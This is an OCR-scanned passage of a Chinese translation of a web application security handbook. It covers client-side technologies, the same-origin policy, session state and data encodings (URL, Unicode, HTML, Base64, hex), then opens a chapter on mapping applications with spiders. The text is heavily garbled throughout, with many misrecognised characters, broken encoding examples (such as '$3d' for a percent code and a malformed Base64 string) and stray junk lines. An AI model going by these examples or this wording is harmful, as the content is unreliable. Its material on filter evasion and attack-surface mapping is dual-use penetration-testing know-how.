CSS 用 于 指定 HTML 内 容 在 屏幕 上 (以 及 打印 页 面 等 其 他 媒介 中 ) 的 呈现 方式 。 

现代 的 Web 标 准 力求 将 文档 的 内 容 与 其 表示 形式 尽 可 能 地 区 分 开 来 。 这 种 区 分 具有 许多 好 
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处 ， 包 括 简 化 和 缩小 HTML 页面 ， 更 多 于 更 新 网 员 的 格式 以 及 提高 可 访问 性 等 。 
CSS 以 各 种 格式 化 规则 为 基础 ， 这 些 规 则 可 以 通过 不 同 的 详细 程度 进行 定义 。 如 果 多 个 规则 
与 一 个 文档 元 素 相 匹配 ， 在 这 些 规则 中 定义 的 不 同属 性 将 进行 “ 层 羡 "， 从 而 将 适当 的 样式 属性 
组 合 应 用 于 该 元 素 。 
CSS 语 法 使 用 选择 器 来 定义 一 类 标记 元 素 ( 应 将 一 组 指定 的 属性 应 用 于 这 些 元 素 )。 例 如 ， 
下 面 的 CSS 规 则 定义 使 用 <h2> 标 签 标 记 的 标题 的 前 景 颜色 : 
h2 { color: red; } 
在 Web 应 用 程序 安全 的 早期 阶段 ，CSS 在 很 大 程度 上 被 人 们 所 忽略 ， 人 们 认为 它们 不 可 能 造 
成 安全 威胁 。 今 天 ，CSS 本 刁 正 不 断 成 为 安全 漏洞 的 来 源 ， 并 且 被 攻击 者 作为 传送 针对 其 他 类 型 
的 漏洞 的 入 侵 程 序 的 有 效 手段 有关 详 细 信 息 ， 请 参阅 第 12 章 和 第 13 草 )。 
5. JavasScript 
超 链接 与 表单 可 用 于 建立 能 够 轻易 接收 大 多 数 Web 应 用 程序 所 需 输 入 的 丰富 用 户 界 面 。 然 
而 ,许多 应 用 程序 使 用 一 种 更 加 分 布 式 的 模型 ,不 仅 使 用 客户 端 提 交 用 户 数据 与 操作 ,还 通过 它 
执行 实际 的 数据 处 理 。 这 样 做 主要 出 于 两 个 原因 。 
口 改善 应 用 程序 的 性 能 ， 因 为 这 样 可 在 客户 端 组 件 上 彻底 执行 某 些 任务 ， 不 需要 在 服务 天 
间 来 回 发 送 和 接收 请 求 与 响应 。 
口 提高 可 用 性 ， 因 为 这 样 可 根据 用 户 操作 动态 更 新 用 户 界 面 ， 而 不 需要 加 载 服务 硕 传 送 的 
全 新 HTML 页面 。 
JavaScript 是 一 种 相对 简单 但 功能 强大 的 编程 语言 , 使 用 它 可 方便 地 以 各 种 仅 使 用 HTML 无 法 
实现 的 方式 对 Web 界 面 进 行 扩展 。JavaScript 销 用 于 执行 以 下 任务 。 
口 确认 用 户 输入 的 数据 ， 然 后 将 其 提交 给 服务 天 避 倪 因 数据 包含 错误 而 提交 不 必要 的 请 求 。 
口 根据 用 户 操作 动态 修改 用 户 界 面 ， 例 如 ， 执 行 下 拉 荣 单 和 其 他 类 似 于 非 Web 界 面 的 控制 。 
口 查询 并 更 新 浏览 规 内 的 文档 对 象 模型 (Document Object Model，DOM )， 控 制 浏览 如 行为 
( 稍 后 就 会 介绍 浏览 妖 DOM )。 
6. VBScript 
VBScript 可 用 于 替代 只 有 Internet Explorer 浏 览 售 才 支 持 的 JavaScript。VBScriptPAVisual Basic 
为 基础 ， 并 可 以 与 浏览 兹 DOM 进 行 交 互 。 但 通常 而 言 ，VBScript 不 如 JavaScript 旨 大 和 成 锅 。 
由 于 VBScript 只 能 在 特定 浏览 带 中 使 用 , 今天 的 Web 应 用 程序 已 经 很 少 使 用 VBScript。 从 安 
全 角度 看 , 我 们 之 所 以 对 它 感 兴趣 , 是 因为 在 使 用 JavaScript 无 法 传送 入 侵 程序 时 , 攻击 者 可 以 通 
过 它 来 传送 针对 路 站 点 脚本 之 类 漏洞 的 入 侵 程 序 (请 参阅 第 12 草 )。 
7. 文档 对 象 模型 
文档 对 象 模型 (DOM ) 是 可 以 通过 其 API 查 询 和 操纵 的 HTML 文 档 的 抽象 表示 形式 。 
DOM 人 允许 客户 问 脚 本 按 id 访 问 各 个 HTML 元 系 并 以 编程 方式 访问 这 些 元 素 的 结构 。DOM 还 
可 用 于 读 取 和 更 新 当前 URL 和 cookie 等 数据 。 男 外 ,DOM 还 包括 一 个 事件 模型 ,以 便于 代码 钩 住 
各 种 事件 ， 如 表单 提交 、 通 过 链接 导航 及 键 击 。 
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如 下 一 节 所 述 ， 浏览 闫 DOM 操 纵 是 基于 Ajax 的 应 用 程序 采用 的 关键 技术 。 

8. Ajax 

Ajax 是 一 组 编程 技术 , 用 于 在 客户 端 创建 则 在 模拟 传统 蝎 面 应 用 程序 的 流畅 交互 和 动态 行为 
的 用 户 界 面 。 

Ajax 是 “异步 JavaScript 和 XML” 的 缩写 ， 尺 管 今天 的 Web Ajax 请 求 既 不 需要 是 异步 请 求 ， 
也 不 使 用 XML。 

最 早 的 Web 应 用 程序 基于 完整 的 页 面 。 每 个 用 户 操作 ， 如 单 击 链接 或 提交 表单 ， 都 会 局 动 窗 
口 级 别 的 导航 事件 ， 导 致 服务 需 加 载 新 页 面 。 这 种 运行 方式 会 导致 不 连续 的 用 户 体验 , 在 应 用 程 
序 收 到 来 和 目 服 务 天 的 庞大 啊 应 并 重新 显示 整个 页 面 时 ， 会 出 现 长 时 间 的 延迟 。 

使 用 Ajax， 一 些 用 户 操作 将 由 客户 端 脚 本 代码 进行 处 理 ， 并 且 不 需要 重新 加 载 整个 页 面 。 相 
反 ， 脚 本 会 “在 后 人 台 ” 执 行 请 求 ， 并 且 通 常会 收 到 较 小 的 啊 应 ， 用 于 动态 更 新 一 部 分 用 户 界 面 。 
例如 ， 在 基于 Ajax 的 购物 应 用 程序 中 ， 如 采用 户 单 击 “ 诬 加 到 购物 车 ”按钮 ， 应 用 程序 将 局 动 一 
个 后 台 请 求 , 在 服务 需 端 更 新 用 户 的 购物 车 记录 ， 随 后 ， 一 个 轻 量 级 啊 应 会 更 新 用 户 屏 幕 上 显示 
的 购物 车 中 商品 的 数量 。 浏 览 硕 中 的 整个 页 面 几 乎 保持 不 变 ,， 这样 就 为 用 户 市 来 更 快速 、 更 满意 
的 体验 。 

Ajax 使 用 的 核心 技术 为 XMLHEttpReauest。 经 过 一 定 程 度 的 标准 整合 之 后 , 这 种 技术 现在 已 
转化 为 一 个 本 地 JavaScript 对 象 ， 客 户 端 脚 本 可 以 通过 该 对 象 提出 “后 合 ” 请 求 ， 而 无 须 窗 口 级 别 
的 导航 事件 。 尽 管 其 名 称 仅 包含 请 求 , 但 XMLHEtpRecuest 人 允许 在 请 求 中 发 送 以 及 在 啊 应 中 接收 
任意 数量 的 内 容 。 虽 然 许 多 Ajax 应 用 程序 确实 使 用 XML 对 消息 数据 进行 格式 化 ， 但 越 来 越 多 的 
Ajax 倾 和 器 于 使 用 其 他 表示 方法 来 交换 数据 (下 一 节 提 供 了 一 个 相关 示例 )。 

值得 注意 的 是 ， 虽 然 大 多 数 Ajax 应 用 程序 确实 与 服务 硕 进 行 异 步 通信 ， 但 这 并 不 是 必需 的 。 
在 某 些 情况 下 ， 如 执行 特殊 操作 时 ， 可 能 需要 阻止 用 户 与 应 用 程序 进行 交互 。 这 时 ， 由 于 不 需要 
重新 加 载 整个 页 面 ，Ajax 将 提供 更 加 无 颖 的 体验 。 

以 前 ， 使 用 Ajax 已 在 Web 应 用 程序 中 引入 了 一 些 新 的 漏洞 。 从 更 广义 的 角度 看 ， 使 用 Ajax 会 
在 服务 硕 端 和 客户 端 引 入 更 多 淤 在 的 攻击 目标 ,因而 增加 了 和 典型 应 用 程序 的 党 攻击 面 。 在 设计 针 
对 其 他 漏洞 的 更 加 高 效 的 入 侵 程 序 时 ， 攻 击 者 也 可 以 利用 Ajax 技术 。 有 关 详 细 信 息 ， 请 参阅 第 12 
章 和 第 13 章 。 

9. JSON 

JavaScript 对 象 表示 法 (JSON ) 是 一 种 可 用 于 对 任意 数据 进行 序列 化 的 简单 数据 交换 格式 。 
JSON 可 直接 申 JavaScript 解 释 需 处 理 。Ajax 应 用 程序 经 党 使 用 JSON， 以 替换 最 初 用 于 数据 传输 的 
XML 格式 。 通 篆 ， 如 宁 用 户 执行 某 个 操作 ， 客 户 端 JavaScript 将 使 用 XMLHEEtpReduest 将 该 操作 
传送 到 服务 大 。 服 务 硕 则 返回 一 个 包含 JSON 格 式 的 数据 的 轻 量 级 啊 应 。 然 后 ， 客 户 端 脚本 将 处 
理 这 些 数据 ， 并 对 用 户 界 面 进行 相应 地 更 新 。 

例如 ， 基 于 Ajax 的 Web 邮 件 应 用 程序 可 能 提供 显示 所 选 联系 人 的 详细 资料 的 功能 。 如 果 用 户 
单 击 某 位 联系 人 人， 浏览 器 将 使 用 xMLHttpRequest 检 索 所 选 联系 人 的 详细 资料 ， 并 使 用 JSON 返 
回 这 些 资 料 : 
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"name”": "Mike Kemp”, 
"id": "8041148671", 
"email": "fkwitt@layerone.com" 


} 
客户 端 脚本 将 使 用 JavaScript 解 释 需 来 处 理 JON 啊 应 并 基于 其 内 容 更 新 用 户 界 面 的 相关 部 分 。 
此 外 ， 当 前 的 应 用 程序 还 将 JSON 用 于 封装 传统 上 位 于 请 求 参 数 中 的 数据 。 人 例如， 如果 用 户 
更 新 联系 人 的 详细 资料 ， 则 可 以 使 用 以 下 请 求 将 新 信息 传送 至 服务 天 : 
POST /contacts HTTP/1.0 


Content-Type: application/x-www-form-urlencoded 
Content-Length: 89 











Contact={"name":"Mike Kemp","1d":"8041148671","email":"pikey@ 








clappymonkey .com"} 
tsSubmit=update 


10. 同 源 策 略 
同 源 策 上 略 是 浏览 带 实 施 的 一 种 关键 机 制 ， 主 要 用 于 防止 不 同 来 源 的 内 容 相 互 干 扰 。 基 本 上 ， 
从 一 个 网 站 收 到 的 内 容 可 以 读 取 并 修改 从 该 站 点 收 到 的 其 他 内 容 , 但 不 得 访问 从 其 他 站 后 收 到 的 
内 容 。 
如 有 果 不 使 用 同 源 策略 ， 那么 ， 当 不 知情 的 用 户 浏 览 到 某 个 恶意 网 站 时 , 在 该 网 站 上 运行 的 脚 
本 代码 将 能 够 访问 这 名 用 户 同时 访问 的 任何 其 他 网 站 的 数据 和 功能 。 这 样 , 该 恶意 站 点 就 可 以 从 
用 户 的 网 上 银行 进行 转账 、 阅 读 用 户 的 Web 邮 件 ， 或 在 用 户 网 上 购物 时 拦截 他 的 信用 卡 信息 。 为 
此 ， 浏览 各 实施 限制 ， 只 允许 相同 来 源 的 内 容 进 行 交 互 。 
实际 上 , 将 这 一 概念 应 用 于 各 种 Web 功 能 和 拉 术 会 导 人 怪 各 种 复 淋 情况 和 风险 。 关 于 同 源 末 上 略 ， 
需要 了 人 解 的 一 些 主要 特点 如 下 。 
D 位 于 一 个 域 中 的 页 面 可 以 向 为 一 个 域 提出 任意 数量 的 请 求 ( 例如 ， 通 过 提交 表单 或 加 载 
图 像 )。 但 该 页 面 本 号 无 法 处 理 上 述 请 求 返 回 的 数据 。 
口 位 于 一 个 域 中 的 页 面 可 以 加 载 来 自 其 他 域 的 脚本 并 在 目 己 的 域 中 执行 这 个 脚本 。 这 是 因 
为 脚本 被 假定 为 包含 代码 ， 而 非 数 据 ， 因 此 蜂 域 访问 并 不 会 泄露 任何 敏感 信息 。 
口 位 于 一 个 域 中 的 页 面 无 法 读 取 或 修改 属于 为 一 个 域 的 cookie 或 其 他 DOM 数 据 。 
这 些 特点 可 能 导致 各 种 跨 域 攻击 ， 如 诱 使 用 户 执 行 操作 和 捕获 数据 。 此 外 ， 由 于 浏览 # 
扩展 技术 以 各 种 方式 实施 同 源 限 制 ， 这 一 问题 变 得 更 加 复杂 。 我 们 将 在 第 13 章 详 细 讨 论 这 些 





















































问题 。 

11. HTML5 

HTML5 是 对 HTML 标准 的 重大 更 新 。 当 前 ，HTMLS 仍 处 在 开发 阶段 ， 仅 在 浏览 器 中 进行 了 
小 规模 实施 。 


从 安全 角度 看 ， 我 们 对 HTML5 感 兴趣 主要 出 于 以 下 原因 。 
口 它 引 入 了 各 种 可 用 于 传送 跨 站 点 脚本 及 实施 其 他 攻击 的 新 标签 、 属 性 和 API ( 会 在 第 12 章 
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讲述 )。 
口 它 对 XMLHttpRequest 这 一 核心 Ajax 技 术 进 行 了 修改 ， 在 某 些 情况 下 可 以 实现 双 癌 里 域 
交互 。 这 可 能 导致 新 的 跨 域 攻击 〈 会 在 第 13 章 讲述 )。 
口 它 引入 了 新 的 客户 端 数 据 存 储 机 制 ， 这 可 能 导致 用 户 隐私 问题 以 及 新 型 攻击 ， 如 客户 端 
SQL 注入 《会 在 第 13 章 讲述 )。 
12. “Web 2.0- 
近 些 年 来 ，Web 2.0 这 个 专业 术语 已 经 成 为 一 个 流行 词汇 , 用 于 Web 应 用 程序 领域 内 的 各 种 相 
关 趋势 (尽管 并 不 准确 ) 的 描述 ， 这 些 趋势 包括 : 
口 大 量 使 用 Ajax 执 行 各 种 异步 后 台 请 求 ; 
口 使 用 各 种 技术 提高 跨 域 集成 ; 
口 在 客户 端 使 用 各 种 新 技术 ， 包 括 XML、JSON 和 Flex; 
口 采用 更 先进 的 技术 来 文 持 用 户 生成 的 内 容 、 信 息 共 部 和 交互 。 
和 技术 领域 的 所 有 新 技术 一 样 ， 这 些 趋势 也 造成 了 各 种 安全 漏洞 。 但 是 ,总体 而 言 ， 这 些 漏 
洞 并 未 形成 新 的 Web 应 用 程序 安全 问题 。Web 2.0 相 关 的 漏洞 在 很 大 程度 上 与 这 种 趋势 出 现 之 前 的 
漏洞 相同 ， 或 派生 自 之 前 的 漏洞 。 总 的 来 说 , “Web 2.0 安 全 ”是 一 个 错误 的 概念 ， 它 对 于 我 们 考 
奈 重 要 的 问题 并 无 帮助 。 
13. 浏览 器 扩展 技术 
除 JavaScript 功 能 外 ， 一 些 Web 应 用 程序 还 通过 采用 浏览 化 扩 展 技术 , 使 用 定制 代码 从 各 方面 
扩展 浏览 絮 的 内 置 功能 。 这些 组 件 可 配置 为 字 市 码 ， 由 适当 的 浏览 各 插件 执行 , 或 需要 在 客户 计 
算 机 上 安装 本 地 可 执行 程序 。 在 攻击 Web 应 用 程序 时 ， 可 能 遇 到 的 厚 客户 端 技 术 包 括 : 
DQ Java applet; 
口 ActiveX 控 件 ; 
口 Flash 对 象 : 
口 Silverlight 对 象 。 
我 们 将 在 第 5 章 详 细 讨 论 这 些 技 术 。 





























3.2.3 ”状态 与 会 话 


迄今 为 止 , 本 书 讨论 的 技术 主要 用 于 帮助 Web 应 用 程序 服务 项 和 客户 端 组 件 以 各 种 方式 进行 
数据 交换 和 处 理 。 但 是 ,为 实现 各 种 有 用 的 功能 ,应 用 程序 需要 追踪 每 名 用 户 通过 不 同 的 请 求 与 
应 用 程序 交互 的 状态 。 例 如 ， 一 个 购物 应 用 程序 允许 用 己 浏 览 产 品目 录 、 往 购物 车 内 添加 商品 、 
查看 并 更 新 购物 车 内 容 、 结 账 并 提供 个 人 与 文 付 信息 。 

为 实现 这 种 功能 , 应 用 程序 必须 维护 一 组 在 提交 各 种 请 求 过 程 中 由 用 户 操作 生成 的 有 状态 数 
据 。 这 些 数据 通 第 保存 在 一 个 叫做 会 话 的 服务 从 端 结构 中 。 当 用 户 执 行 一 个 操作 ( 如 在 购物 车 中 
添加 一 件 商 品 ) 时 ， 服 务 带 冰 应 用 程序 会 在 用 户 会 话 内 更 新 相关 信息 。 以 后 用 户 查 看 购物 和 车 中 的 
内 容 时 ， 应 用 程序 就 使 用 会 话 中 的 数据 向 用 户 返 回 正确 的 信息 。 
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在 一 些 应 用 程序 中 ， 状 态 信息 保存 在 客户 端 组 件 而 非 服务 器 中 。 服 务 器 在 啊 应 中 将 当前 的 
数据 传送 给 客户 端 ， 客 户 端 再 在 请 求 中 将 其 返回 给 服务 器 。 当 然 ， 由 于 通过 客户 端 组 件 传 送 的 
任何 数据 都 可 被 用 户 人 和 修改， 因此， 应 用 程序 需要 采取 措施 阻止 攻击 者 更 改 这些 状 态 信息 ， 破 坏 
应 用 程序 的 逻辑 。ASPNET 平 人 台 利 用 隐藏 表单 字段 ViewState 保 存 与 用 户 的 Web 界 面 有 关 的 状 
态 信 息 ， 从 而 减轻 服务 费 的 工作 人 负担。 默认 情况 下 ,ViewSstate 的 内 容 中 还 包括 一 个 密 钥 散 列 ， 
以 防止 受到 破坏 。 

为 HTTP 协 议 本 身 并 没有 状态 ， 为 使 用 正确 的 状态 数据 处 理 每 个 请 求 ， 大 多 数 应 用 程序 需 
要 采用 某 种 方法 在 各 种 请 求 中 重新 确认 每 一 名 用 户 的 刁 份 。 通常， 应 用 程序 会 癌 每 名 用 户 发 布 一 
个 令 牌 ， 对 用 户 会 话 进行 唯一 标识 ， 从 而 达到 这 一 目的 。 这 些 令 牌 可 使 用 任何 请 求 参数 传输 ,但 
许多 应 用 程序 往往 使 用 HTTP cookie 来 完成 这 项 任务 。 会 话 处 理 过 程 中 也 会 产生 几 种 漏洞 ， 第 7 章 
将 详细 讨论 这 些 内 容 。 


3.3 ”编码 方案 


Web 应 用 程序 对 其 数据 采用 几 种 不 同 的 编码 方案 。 在 早期 阶段 , HTTP 协 议和 HTML 语 言 部 是 
基于 文本 的 , 于 是 人 们 设计 出 不 同 的 编码 方案 , 确保 这 些 机 制 能 够 安全 人 处理 不 津 见 的 字符 和 二 进 
制 数据 。 攻 击 Web 应 用 程序 通 弟 需要 使 用 相关 方案 对 数据 进行 编码 ,确保 应 用 程序 按照 想 要 的 方 
式 对 其 进行 处 理 。 而 且 , 在 许多 情况 下 ,攻击 者 甚至 能 够 控制 应 用 程序 所 使 用 的 编码 方案 ,造成 
其 设计 人 员 无 法 预料 的 行为 。 

































































3.3.1 ”URL 编码 


URL 只 允许 使 用 US-ASCII 字 从 集中 的 可 打印 字符 (也 就 古 ASCII 代 人 码 在 0x20 ~ 0x7e 泄 围 内 的 
字符 ) 而 且 , 由 于 其 在 URL 方 案 或 HITP 协 以 内 具有 特殊 含义 ， 这 个 范围 内 的 一 些 字 符 也 不 能 
在 URL 中 。 

URL 编 码 方 案 主要 用 于 对 扩展 ASCII 字 符 集中 的 任何 有 问题 的 字符 进行 编码 ， 使 其 可 通过 
HTTP 安 全 传输 。 任何 URL 编 码 的 字符 都 以 % 为 前 级 , 其 后 是 这 个 字符 的 两 位 十 六 进 制 ASCII 代 码 。 
以 下 是 一 些 常见 的 URL 编 码 字 符 : 

口 $3d 代 表 =; 

口 $525 代表 %; 

口 $20 代表 空格 ; 

口 $0a 代 表 新 行 ; 

口 $00 代 表 空 学 市 。 

妨 一 个 值得 注音 的 编码 字符 是 加 号 (+ )， 它 代表 URL 编 码 的 空格 ( 除 $20 代 表 空 格外 )。 
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注解 ” 当 攻 击 Web 应 用 程序 时 ， 如 果 需 要 将 以 下 字符 当做 数据 插入 HTTP 请 求 中 ， 洲 :; 
测试 员 必 须 对 它们 进行 URE 编码 。 


室 格 宫 ?了 & = 二 ;十 # 
( 当然 ， 当 修改 请 求 时 ,往往 需要 使 用 这 些 字符 的 特殊 含义 ， 例如， 给 查询 字符 串 
添加 另外 一 个 请 求 参数 。 这 时 应 使 用 这 些 字符 的 字面 量 形式 。) 





3.3.2 ”Unicode 编码 


Unicode 是 一 种 为 文 持 全 世界 所 使 用 的 各 种 编写 系统 而 设计 的 字符 编码 标准 ， 它 采用 各 种 编 
伍 方 和 柠 ， 其 中 一 些 可 用 于 表示 Web 应 用 程序 中 的 不 稼 见 字 符 。 

16 们 Unicode 编 码 的 工作 原理 与 URL 编 码 类 似 。 为 通过 HTTP 进 行 传输 ，16 位 Unicode 编 码 的 
字符 以 %u 为 前 缀 ， 其 后 是 这 个 字符 的 十 六 进 制 Unicode 码 点 。 例 如 : 

口 su2215 代 表 /; 

D su00e9 代 表 &。 

UTF-8 是 一 种 长 度 可 变 的 编码 标准 ， 它 使 用 一 个 或 几 个 字 市 表示 每 个 字符 。 为 通过 HTTP 进 
行 传输 ，UTF-8 编 码 的 多 学 市 字符 以 % 为 前 级 ， 其 后 用 十 六 进 制 表示 每 个 字 广 。 例 如 : 

口 sc2%a9 代 表 @; 

口 $e2%89%a0 代 表 关 。 

攻击 Web 应 用 程序 时 之 所 以 要 用 到 Unicode 编 码 ， 主 要 在 于 有 时 可 用 它 来 破坏 输入 确认 机 制 。 
如 果 输 入 过 滤 阻 止 了 某 些 恶 意 表达 式 ， 但 随后 人 处理 输入 的 组 件 识别 Unicode 编 码 ， 就 可 以 使 用 各 
种 标准 与 畸形 Unicode 编 码 避 开 过 滤 。 




















3.3.3 ” HTML 编码 


HITML 编 码 是 一 种 用 于 表示 问题 字符 以 将 其 安全 并 和 人 HITMIL 文 档 的 方案 。 有 许多 字符 具 
丈 的 含义 (如 HTML 内 的 元 字符 )， 并 被 用 于 定义 文档 结构 而 非 其 内 容 。 为 了 安全 使 用 这 些 
并 将 其 用 在 文档 内 容 中 ， 就 必须 对 其 进行 HTML 编 码 。 

HTML 编 码 定 义 了 大 量 HTML 实 体 来 表示 特殊 的 字面 量 字 符 ， 例 如 : 

口 gquot ;代表 "; 

D gapos; 代 表 '; 

D gamp ;代表 &; 

D glt ;代表 <; 

口 ggt ;代表 >。 

此 外 ， 任 何 字 符 都 可 以 使 用 它 的 十 进 制 ASCII 码 进行 HTML 编 码 ， 例 如 : 








有 特 
字符 
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口 g#34; 代 表 "; 

口 xs#39; 人 代表 ' 。 
或 者 使 用 十 六 进 制 的 ASCII 码 ( 以 x 为 前 级 )， 例如: 

口 g#x22 ;代表 "; 

口 g#x27 ;代表 ' 区 

当 攻 击 Web 应 用 程序 时 ，HTML 编 码 主要 在 探查 蜂 站 点 脚本 漏洞 时 发 挥 作 用 。 如 采 应 用 程序 
在 啊 应 中 返回 未 被 修改 的 用 户 输入 ， 那 么 它 可 能 易于 受到 攻击 ; 但 是 ， 如 果 它 对 危险 字符 进行 
HITML 编 码 ， 也 许 比 较 安 全 。 请 参阅 第 12 草 了 解 有 关 这 些 漏洞 的 更 多 详情 。 











3.3.4 ”Base64 编码 





Base64 编 但 仅 用 一 个 可 打印 的 ASCI 字 符 就 可 安全 转换 任何 二 进 制 数 据 , 它 背 用 于 对 电子 邮 
件 附件 进行 编码 ， 使 其 通过 SMTP 安 全 传输 。 它 还 可 用 于 在 基本 HTTP 验 证 机 制 中 对 用 户 证 书 进 
行 编 码 。 

Base64 编 但 将 输入 数据 转换 成 3 个 字 节 块 。 每 个 块 被 划分 为 4 段 ， 每 段 6 个 效 据 位 。 这 6 个 数据 
位 有 64 种 不 同 的 排列 ， 因 此 每 个 段 可 使 用 一 组 64 个 字符 表示 。Base64 编 码 使 用 以 下 字符 集 ， 其 中 
只 包含 可 打印 的 ASCII 字 符 : 

ABCDEFGHIJKLMNOPORSTUVIWXYZabcdefghijklmnopqrstuvwxyz0123456789+/ 

如 采 最 后 的 输入 数据 块 不 能 构成 3 段 输出 数据 ， 就 用 一 个 或 两 个 每 号 (= ) 补足 输出 。 
例如 ，The Web Application Hacker x Hand book 的 Base64 编 公 为 : 











VGh1lIFdlyiBBcHBsawNhdGlvbiBIYWNrZXIncyBIYN5kYm9vaw== 

许多 Web 应 用 程序 利用 Base64 编 码 在 cookie 与 其 他 参数 中 传送 二 进 制 数 据 ， 甚 至 用 它 打 乱 敏 
感 数据 以 防止 即使 是 细微 的 修改 。 应 该 总 是 留意 并 解码 发 送 到 客户 端的 任何 Base64 数 据 。 由 于 这 
些 数据 使 用 特殊 的 字符 集 ， 而 且 有 时 会 在 字符 串 末 尾 添 加 补足 字符 (= )， 因 此 可 以 轻易 辨别 出 
Base64 编 码 的 字符 串 。 














3.3.5 ”十 六 进 制 编码 

许多 应 用 程序 在 传送 二 进 制 数据 时 直接 使 用 十 六 进 制 编码 ， 用 ASCII 字 符 表 示 十 六 进 制 数据 
块 。 例 如 ， 对 cookie 中 的 用 户 名 daf 进 行 十 六 进 制 编码 ， 会 得 到 以 下 结 

Sleige 

和 Base64 编 码 的 数据 一 样 ， 十 六 进 制 编码 的 数据 通常 也 很 容易 辨认 。 为 了 解 十 六 进 制 编码 的 
功能 应 当 对 服务 需 发 送 到 客户 端的 任何 十 六 进 制 数据 进行 解码 。 








3.3.6 ”远程 和 序列 化 框架 
近 些 年 出 现 了 各 种 用 于 创建 用 户 界面 的 框架 , 这 些 框架 中 的 客户 端 代码 可 以 远程 访问 服务 器 
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冲 实 施 的 编程 API。 利 用 这 些 框架 ， 开发 者 可 以 在 一 定 程度 上 忽略 Web 应 用 程序 的 分 布 式 本 质 ， 
而 以 与 开发 传统 如 面 应 用 程序 类 似 的 方式 编写 代码 。 这 些 框架 通常 提供 客户 问 上 使 用 的 存根 API。 
它们 还 能 够 自动 处 理 以 下 两 个 任务 : 通过 这 些 API 远 程 调 用 相关 服务 器 端 功 能 ， 对 传送 给 上 述 功 
能 的 任何 数据 进行 序列 化 。 

这 类 远程 和 序列 化 框架 包括 : 

口 Flex 和 AMF ; 

D Silverlight 和 WCF; 

口 Java 序 列 化 对 象 。 
我 们 将 在 第 4 曹 和 第 5 革 讨 论 使 用 这 些 框架 的 技巧 以 及 由 此 引发 的 安全 问题 。 




















3.4 下 一 步 


到 现在 为 止 ， 我 们 已 经 介绍 了 Web 应 用 程序 的 当前 安全 《风险 ) 状况 ， 分 析 了 Web 应 用 程序 
的 核心 防御 机 制 ， 并 简要 介绍 了 当今 应 用 程序 所 采用 的 关键 技术 。 基 于 这 些 基 础 知识 ,现在 我 们 
将 开始 研究 渗透 测试 员 如 何 癌 Web 应 用 程序 发 动 攻击 。 

在 实施 任何 攻击 之 前 ,首要 任务 是 仔细 分 析 目 标 应 用 程序 的 内 容 及 功能 , 了 解 它 的 工作 原理 、 
防御 机 制 及 其 使 用 的 技术 。 我 们 将 在 下 一 章 详 细 介绍 这 个 解析 过 程 ,说 明 如 何 通过 它 深 人 了 解 应 
用 程序 的 受 攻击 面 。 实 践 证 明 , 这 个 过 程 对 于 渗透 测试 员 发 现 并 利用 目标 应 用 程序 的 安全 漏洞 至 
天 重要 。 





























3.5 ”问题 


欲 知 问题 答案 ， 请 访问 http:/mdsec.net/wahh。 

(1) OPTIONS 方 法 有 什么 作用 ? 

(2) If-Modified-Since 和 If-None-Match 消 息 头 的 作用 是 什么 ? 它们 为 何 引起 攻击 者 的 
兴趣 ? 

(3) 当 服 务 器 设置 cookie 时 ，secure 标 签 有 什么 意义 ? 

(4) 常用 状态 码 301 与 302 有 什么 不 同 ? 

(5) 使 用 SSL 时 ， 浏 览 絮 如 何 与 Web 代 理 实 现 互 操作 ? 
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JW ot tN me el nt ha i 
解析 过 程 首先 是 枚 举 应 用 程序 的 内 容 与 功能 ， 从 而 了 解 应 用 程序 的 实际 功能 与 运行 机 
制 。 我们 可 轻松 确定 应 用 程序 的 大 部 分 功能 , 但 其 中 一 些 功能 并 不 明显 ， 需 要 进行 猜测 和 和 攒 借 一 
定 的 运气 才能 碍 明 。 

列 出 应 用 程序 的 功能 后 ， 接 下 来 的 首要 任务 就 是 仔细 分 析 应 用 程序 运行 机 制 的 每 一 个 方面 、 
核心 安全 机 制 及 其 〈 在 客户 端 和 服务 础 上 ) 使 用 的 技术 。 这 样 就 可 以 确定 应 用 程序 雄 露 的 主要 受 
攻击 面 并 因此 确定 随后 探查 过 程 的 主要 目标 , 进而 发 现 可 供 利用 的 源 洞 。 我们 在 本 章 后 面部 分 将 
讲 到 ， 通 和 在 分 析 过 程 中 就 可 以 发 现 相 关 漏 洞 。 

随 着 应 用 程序 变 得 越 来 越 复 杂 ， 功 能 越 来 越 强 大 ， 有 效 的 解析 将 成 为 一 种 重要 技能 。 经验 让 
宣 的 专家 能 够 迅速 对 所 有 功能 区 域 进行 分 类 , 参照 各 种 实例 查找 不 同类 型 的 漏洞 , 同时 花费 大 量 
时 间 测 试 其 他 特定 区 域 ， 以 确定 高 风险 的 问题 。 

本 章 将 描述 应 用 程序 解析 过 程 的 主要 步 又 、 各 种 可 用 来 提高 效率 的 技巧 与 守门 ,以 及 一 些 帮 
助 进行 解析 的 工具 。 


4.1 枚 举 内 容 与 功能 


通 前 , 手动 浏览 即 可 确定 应 用 程序 的 绝 大 部 分 内 容 与 功能 。 浏 览 应 用 程序 的 基本 方法 是 从 主 
初始 页 面 开 始 ， 然 后 是 每 一 个 链接 和 所 有 多 阶段 功能 〈 如 用 户 注册 或 密码 重 设 置 ) 如 采 应 用 程 
序 有 一 个 “站 点 地 图 ”"， 可 以 从 它 开 始 枚 举 内 容 。 

但 是 , 为 了 仔细 检查 枚 举 的 内 容 , 全 面 记录 每 一 项 确定 的 功能 ,我 们 有 必要 使 用 一 些 更 加 先 
进 的 技术 ， 而 不 仅仅 是 简单 浏览 。 


















































4.1.1 Web 抓 取 


我 们 可 使 用 各 种 工具 日 动 抓 取 Web 站 扣 的 内 容 。 这 些 工 具 前 先 请 求 一 个 Web 页 面 ， 对 其 进行 
分 析 ， 查 找 连 接 到 其 他 内 容 的 链接 ,然后 请 求 这 些 内 容 ， 青 继续 进行 这 个 循环 ， 和 直到 找 不 到 新 的 
内 容 为 止 。 

基于 这 一 基本 功能 ，Web 应 用 程序 人 息 虫 ( spider ) 以 同样 的 方式 分 析 HTML 表 单 ， 并 使 用 各 种 
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预 完 设 定 值 或 随机 值 将 这 些 表 单 返 回 给 应 用 程序 ， 以 扩大 搜索 旋 围 、 浏 览 多 阶段 功能 、 进 行 基 于 
表单 的 导航 ( 如 什么 地 方 使 用 下 拉 列 表 作 为 内 容 菜 单 ) 一 些 工 具 还 对 客户 端 JavaScript 进 行 某 种 
形式 的 分 析 , 以 提取 指向 其 他 内 容 的 URL. 有 各 种 免费 工具 可 以 详细 枚 人 举 应 用 程序 的 内 容 与 功能 ， 
它们 包括 Burp Suite、WebScarab 、Zed Attack Proxy 和 CAT ( 请 参阅 第 20 章 了 解 详 情 )。 








